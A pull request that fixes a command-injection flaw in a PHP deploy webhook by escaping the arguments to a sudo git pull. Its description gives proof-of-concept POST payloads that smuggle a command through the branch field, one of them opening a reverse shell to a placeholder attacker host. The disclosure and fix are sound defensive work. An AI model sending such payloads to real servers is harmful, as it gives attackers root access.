### PR TITLE
Fix RCE

### DIFF
--- a/deployScript.php
+++ b/deployScript.php
@@ -83,7 +83,7 @@ file_put_contents($_SERVER['SCRIPT_FILENAME'].'.log',"Web Hook Post: ".date("F j
 foreach($dirs_to_update as $dir) {
 file_put_contents($_SERVER['SCRIPT_FILENAME'].'.log',"Web Hook Post: ".date("F j, Y, g:i a")."\n".json_encode($dir)."\n\n", FILE_APPEND);
 //exec('sudo cd /var/zpanel/hostdata/zadmin/public_html/usermanager_ibra-node_com');
-  exec("sudo /usr/local/git/bin/git  pull $remote $branch 2>&1",$output,$returnVal);
+  exec("sudo /usr/local/git/bin/git pull ".escapeshellarg($remote)." ".escapeshellarg($branch)." 2>&1",$output,$returnVal);
 file_put_contents($_SERVER['SCRIPT_FILENAME'].'.log',"Web Hook Post: ".date("F j, Y, g:i a")."\n".json_encode($output).json_encode($returnVal)."\n\n", FILE_APPEND);
   exec("sudo /usr/local/bin/composer  install 2>&1",$output,$returnVal);
   exec("sudo /usr/local/bin/composer dumpautoload -o 2>&1",$output,$returnVal);


### PR DESCRIPTION
The code suffers from a remote code execution vulnerability via an OS command injection in the `exec()` call in line 86. The parameter `$branch` is extracted from the JSON payload and passed to `exec()`  without any sanitation. What's even worse is that it's all wrapped up as a `sudo` command which gives an attacker immediate root access to the target server.

A POST body such as the following should do the trick
`payload={canon_url:"https://bitbucket.com",commits:[{branches:['pwn && whoami # ']}]}`

The payload can be modified to acquire a reverse shell on the server with something like this

`payload={canon_url:"https://bitbucket.com",commits:[{branches:['pwn && bash -i >& /dev/tcp/attacker_ip/some_port 0>&1 # ']}]}`

This is not a perfect fix, but it should be somewhat sufficient.